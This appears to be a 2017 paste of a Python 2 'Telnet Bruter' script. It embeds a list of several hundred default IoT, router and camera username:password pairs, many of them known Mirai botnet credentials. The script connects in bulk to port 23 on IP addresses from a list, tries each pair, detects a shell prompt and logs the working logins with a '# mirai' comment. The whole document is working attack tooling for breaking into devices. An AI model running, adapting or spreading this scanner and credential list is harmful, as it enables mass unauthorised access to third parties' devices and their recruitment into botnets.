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May 31st, 2017
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  1. #!/usr/bin/python
  2. # Simple Telnet Bruter | By; LiGhT
  3. # Lots of false possitives but pulls alot of results extremely fast
  5. import threading
  6. import sys, os, re, time, socket
  7. from Queue import *
  8. from sys import stdout
  10. if len(sys.argv) < 4:
  11. print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
  12. sys.exit()
  14. combo = [
  15. "support:support",
  16. "root:vizxv",
  17. "root:xc3511",
  18. "telnet:telnet",
  19. "root:root",
  20. "supervisor:zyad1234",
  21. "root: ",
  22. "admin:1234",
  23. "user:user",
  24. "root:antslq",
  25. "admin:admin",
  26. "Admin:123456",
  27. "admin:admin",
  28. "admin:123456",
  29. "root:camera",
  30. "Admin:1234",
  31. "admin:fliradmin",
  32. "admin:1234",
  33. "admin:jvc",
  34. "root:admin",
  35. "root:Admin",
  36. "admin:meinsma",
  37. "admin:1111111",
  38. "admin:4321",
  39. "admin:password",
  40. "root:ikwd",
  41. "admin:wbox",
  42. "supervisor:supervisor",
  43. "dm3500:merlin",
  44. "ubnt:ubnt",
  45. "none:backdoor",
  46. "device:device",
  47. "apc:apc",
  48. "none:atc123",
  49. "(none):public",
  50. "none:password",
  51. "scout:scout",
  52. "none:admin",
  53. "root:ascend",
  54. "none:ascend",
  55. "admin:epicrouter",
  56. "customer:none",
  57. "operator:1234User",
  58. "Service:5678Service",
  59. "admin:atlantis",
  60. "root:ROOT500",
  61. "manuf:xxyyzz",
  62. "diag:danger",
  63. "craft:crftpw",
  64. "root:cms500",
  65. "Administrator:ggdaseuaimhrke",
  66. "root:ggdaseuaimhrke",
  67. "root:tslinux",
  68. "root:pass",
  69. "none:NetICs",
  70. "security:security",
  71. "manager:friend",
  72. "manager:manager",
  73. "admin:bintec",
  74. "admin:articon",
  75. "patrol:patrol",
  76. "service:service",
  77. "tech:tech",
  78. "live:live",
  79. "none:Master",
  80. "none:laflaf",
  81. "none:Helpdesk",
  82. "none:Super",
  83. "installer:installer",
  84. "root:fivranne",
  85. "webadmin:webadmin",
  86. "user:password",
  87. "root:Serv4EMC",
  88. "admin:access",
  89. "admin:netadmin",
  90. "mediator:mediator",
  91. "root:Mau'dib",
  92. "cellit:cellit",
  93. "admin:diamond",
  94. "admin:1234admin",
  95. "Adminstrator:changeme",
  96. "netrangr:attack",
  97. "cmaker:cmaker",
  98. "admin:changeme",
  99. "bbsd-client:changeme2database",
  100. "bbsd-client:NULL",
  101. "root:attack",
  102. "admin:default",
  103. "Cisco:Cisco",
  104. "admin:cisco",
  105. "root:blender",
  106. "hsa:hsasdb",
  107. "wlse:wlsedb",
  108. "wlseuser:wlsepassword",
  109. "root:password",
  110. "citel:password",
  111. "admin:system",
  112. "epicrouter:admin",
  113. "cgadmin:cgadmin",
  114. "super:surt",
  115. "root:tini",
  116. "anonymous:any@",
  117. "root:davox",
  118. "davox:davox",
  119. "root:calvin",
  120. "admin:my_DEMARC",
  121. "MDaemon:MServer",
  122. "PBX:PBX",
  124. "none:BRIDGE",
  125. "admin:michaelangelo",
  126. "Alphanetworks:wrgg15_di524",
  127. "Alphanetworks:firmware",
  128. "draytek:1234Admin",
  129. "edimax:software01",
  130. "admin:Administration",
  131. "admin:su@psir",
  132. "login:admin",
  133. "login:password",
  134. "none:4getme2",
  135. "tiger:tiger123",
  136. "MD110:help",
  137. "admin:extendnet",
  138. "anonymous:Exabyte",
  139. "root:default",
  140. "none:Posterie",
  141. "manage:!manage",
  142. "admin:radius",
  143. "netadmin:nimdaten",
  144. "admin:isee",
  145. "Factory:56789Admin",
  146. "storwatch:specialist",
  147. "vt100:public",
  148. "superadmin:secret",
  149. "hscroot:abc123",
  150. "admin:P@55w0rd!",
  151. "root:iDirect",
  152. "Administrator:pilou",
  153. "setup:setup",
  154. "admin:hello",
  155. "admin:adslroot",
  156. "admin:administrator",
  157. "susAdmin:Administrator",
  158. "none:0Admin",
  159. "admin:123Admin",
  160. "admin:123456Admin",
  161. "superuser:123456",
  162. "superuser:123456special",
  163. "superuser:superuser",
  164. "none:admin00",
  165. "root:orion99",
  166. "user:tivonpw",
  167. "setup:changeme",
  168. "admin:Ascend",
  169. "super:super",
  170. "readwrite:lucenttech1",
  171. "admin:AitbISP4eCiG",
  172. "service:smile",
  173. "cablecom:router",
  174. "admin:motorola",
  175. "sysadm:sysadm:",
  176. "SYSADM:sysadm",
  177. "vcr:NetVCR",
  178. "none:xdfk9874t3",
  179. "disttech:4tas",
  180. "maint:maint",
  181. "m1122:m1122",
  182. "root:3ep5w2u",
  183. "maint:ntacdmax",
  184. "supervisor:PlsChgMe",
  185. "write:private",
  186. "admin:smallbusiness",
  187. "admin:mu",
  188. "admin:microbusiness",
  189. "admin:pfsense",
  190. "admin:superuser",
  191. "engmode:hawk201",
  192. "support:h179350",
  193. "lp:lp",
  194. "radware:radware",
  195. "wradmin:trancell",
  196. "none:Col2ogro2",
  197. "sysadmin:password",
  198. "teacher:password",
  199. "integrator:p1nacate",
  200. "operator:col1ma",
  201. "administrator:d1scovery",
  202. "root:1234User",
  203. "admin:w2402",
  204. "admin:Sharp",
  205. "superuser:admin",
  206. "poll:tech",
  207. "eng:engineer",
  208. "Administrator:ganteng",
  209. "none:smcadmin",
  210. "Administrator:smcadmin",
  211. "smc:smcadmin",
  212. "admin:smcadmin",
  213. "admin:barricade",
  214. "cusadmin:highspeed",
  215. "mso:w0rkplac3rul3s",
  216. "stratacom:stratauser",
  217. "Symbol:Admin",
  218. "target:password",
  219. "sweex:mysweex",
  220. "admin:symbol",
  221. "operator:mercury",
  222. "guest:truetime",
  223. "admin:12345Admin",
  224. "super.super:master",
  225. "xbox:xbox",
  226. "tellabs:tellabs#1",
  227. "root:admin_1",
  228. "superman:talent",
  229. "Admin:123456Admin",
  230. "admin:imss7.0",
  231. "admin:detmond",
  232. "admin:1111Admin",
  233. "admin:22222Admin",
  234. "admin:x-admin",
  235. "11111:x-admin",
  236. "diag:switch",
  237. "admin:switch",
  238. "admin:zoomadsl",
  239. "ADSL:expert03",
  240. "root:anko",
  241. "root:oelinux123",
  242. "root:alpine",
  243. "root:maxided",
  244. "pi:raspberry",
  245. "vagrant:vagrant",
  246. "telnet:telnet",
  247. "root:zlxx.",
  248. "root:juantech",
  249. "root:avtech",
  250. "root:vizxv",
  251. "root:xc3511",
  252. "guest:xc3511",
  253. "666666:666666",
  254. "888888:888888",
  255. "111111:111111",
  256. "admin:bayandsl",
  257. "adminpldt:12345676890",
  258. "root:1234567890",
  259. "telecomadmin:admintelecom",
  260. "admintelecom:telecomadmin",
  261. "root:comcom",
  262. "root:zte9x15",
  263. "ZXDSL:ZXDSL",
  264. "root:Zte521",
  265. "D-Link:D-Link",
  266. "dlink:dlink",
  267. "DLink:DLink",
  268. "ftpuser:asteriskftp",
  269. "root:dreambox",
  270. "root:1111",
  271. "root:1234",
  272. "root:12345",
  273. "root:123456",
  274. "root:54321",
  275. "root:666666",
  276. "mother:fucker",
  277. "admin1:password",
  278. "admin:7ujMko0admin",
  279. "admin:7ujMko0vizxv",
  280. "root:7ujMko0admin",
  281. "root:7ujMko0vizxv",
  282. "root:hi3518",
  283. "root:klv123",
  284. "root:klv1234",
  285. "root:system",
  286. "root:realtek",
  287. "root:jvbzd",
  288. "root:xmhdipc",
  289. "openlgtv:openlgtv",
  290. "root:root123",
  291. "root:ahetzip8",
  292. "root:696969",
  293. "root:pa55w0rd",
  294. "root:123123",
  295. "root:b120root",
  296. "root:PASSWORD",
  297. "admin:ADMIN",
  298. "ADMIN:ADMIN",
  299. "netgear:netgear",
  300. "ibm:password",
  301. "vyatta:vyatta",
  302. "Admin:atc456",
  303. "micros:micros",
  304. "comcast:comcast",
  305. "pos:pos",
  306. "www:www",
  307. "2800:2800",
  308. "UBNT:UBNT",
  309. "netman:",
  310. "aDMIN:1111",
  311. "aDMIN:123456",
  312. "admin:54321",
  313. "root:00000000",
  314. "root:user",
  315. "root:ikwb",
  316. "root:changeme",
  317. "Administrator:",
  318. "administrator:1234",
  319. "root:ubnt",
  320. "Administrator:public",
  321. "Administrator:buh",
  322. "Administrator:admin",
  323. "admin:utstar",
  324. "admin:99999999",
  325. "admin:Meins",
  326. "admin:JVC",
  327. "admin:admin00",
  328. "admin:ip20",
  329. "admin:ip3000",
  330. "admin:ip400",
  331. "admin:tsunami",
  332. "admin:public",
  333. "admin:2601hx",
  334. "admin:synnet",
  335. "quser:quser",
  336. "tech:",
  337. "Manager:",
  338. "Manager:Manager",
  339. " :ascend",
  340. "ascend:ascend",
  341. "dlink:default",
  342. "login:user",
  343. "login:pass",
  344. "!root:",
  345. "netopia:netopia",
  346. "sysadm:sysadm",
  347. "sysadm:anicust",
  348. "debug:d.e.b.u.g",
  349. "debug:synnet",
  350. "echo:echo",
  351. "daemon:daemon",
  352. "demo:demo",
  353. "arris:admin",
  354. "Linksys:admin",
  355. "client:client",
  356. "cisco:CISCO",
  357. "7654321:7654321",
  358. "adsl:adsl1234",
  359. "root:toor",
  360. "dm:telnet",
  361. " :netadmin",
  362. " :hewlpack",
  363. " :NetICs",
  364. "adminttd:adminttd",
  365. "PlcmSpIp:PlcmSpIp",
  366. "11111111:11111111",
  367. "22222222:22222222",
  368. "mountsys:mountsys",
  369. "memotec:supervisor",
  370. "root:LSiuY7pOmZG2s",
  371. "Admin:3UJUh2VemEfUte",
  372. "museadmin:Muse!Admin",
  373. "adminpldt:1234567890",
  374. "pldtadmin:1234567890",
  375. "bbsd-client:changeme2"
  376. ]
  378. ips = open(sys.argv[1], "r").readlines()
  379. threads = int(sys.argv[2])
  380. output_file = sys.argv[3]
  381. queue = Queue()
  382. queue_count = 0
  384. for ip in ips:
  385. queue_count += 1
  386. stdout.write("\r[%d] Added to queue" % queue_count)
  387. stdout.flush()
  388. queue.put(ip)
  389. print "\n"
  392. class router(threading.Thread):
  393. def __init__ (self, ip):
  394. threading.Thread.__init__(self)
  395. self.ip = str(ip).rstrip('\n')
  396. def run(self):
  397. username = ""
  398. password = ""
  399. for passwd in combo:
  400. if ":n/a" in passwd:
  401. password=""
  402. else:
  403. password=passwd.split(":")[1]
  404. if "n/a:" in passwd:
  405. username=""
  406. else:
  407. username=passwd.split(":")[0]
  408. try:
  409. tn = socket.socket()
  410. tn.settimeout(8)
  411. tn.connect((self.ip,23))
  412. except Exception:
  413. tn.close()
  414. break
  415. try:
  416. hoho = ''
  417. hoho += readUntil(tn, "ogin:")
  418. if "ogin" in hoho:
  419. tn.send(username + "\n")
  420. time.sleep(0.15)
  421. except Exception:
  422. tn.close()
  423. try:
  424. hoho = ''
  425. hoho += readUntil(tn, "assword:")
  426. if "assword" in hoho:
  427. tn.send(password + "\n")
  428. time.sleep(0.15)
  429. else:
  430. pass
  431. except Exception:
  432. tn.close()
  433. try:
  434. prompt = ''
  435. prompt += tn.recv(40960)
  436. if ">" in prompt and "ONT" not in prompt:
  437. success = True
  438. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
  439. success = True
  440. else:
  441. tn.close()
  442. if success == True:
  443. try:
  444. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # user:pass # mirai
  445. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
  446. tn.close()
  447. break
  448. except:
  449. tn.close()
  450. else:
  451. tn.close()
  452. except Exception:
  453. tn.close()
  455. def readUntil(tn, string, timeout=8):
  456. buf = ''
  457. start_time = time.time()
  458. while time.time() - start_time < timeout:
  459. buf += tn.recv(1024)
  460. time.sleep(0.50)
  461. if string in buf: return buf
  462. raise Exception('TIMEOUT!')
  464. def worker():
  465. try:
  466. while True:
  467. try:
  468. IP = queue.get()
  469. thread = router(IP)
  470. thread.start()
  471. queue.task_done()
  472. time.sleep(0.50)
  473. except:
  474. pass
  475. except:
  476. pass
  478. for l in xrange(threads):
  479. try:
  480. t = threading.Thread(target=worker)
  481. t.start()
  482. except:
  483. pass
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